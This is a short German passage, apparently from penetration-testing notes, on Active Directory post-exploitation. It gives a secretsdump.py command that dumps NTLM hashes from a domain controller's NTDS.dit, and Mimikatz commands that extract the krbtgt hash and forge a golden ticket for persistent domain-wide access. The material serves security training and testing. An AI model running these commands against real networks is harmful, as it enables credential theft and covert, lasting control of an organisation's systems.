Wenn die Domäne erfolgreich unter Kontrolle gebracht wurde, können noch die Datei Shares nach wertvollen Informationen durchsucht werden. Und die [[AD Begriffe#NTDS.dit|NTDS.dit]] abgegriffen werden um weitere Passwörter zu cracken. Eine weitere Möglichkeit ist für Persistenz zu sorgen, beispielsweise durch erstellen eines Goldenen Tickets oder eines Domänen Admins. Der folgende Befehl holt sich die Hashes aus der [[AD Begriffe#NTDS.dit|NTDS.dit]].
secretsdump.py <DOMAIN>/User:'<PASSWORD>'@<DC IP> -just-dc-ntlm
Golden Tickets
Mit der Übernahme des Kerberos Ticket Granting Ticket(krbtgt) Accounts ist es möglich Tickets für alles zu erstellen. Also ist es möglich Tickets für alle Ressourcen und Maschinen im Netz zu erstellen.
privilege::debug
lsadump::lsa /inject /name:krbtgt
kerberos::golden /User:<USER MUSS NICHT EXISTIEREN> /domain:<DOMAIN> /sid:<SID> /krbgt:<KRBTGT NTLM HASH> /id:500 /ptt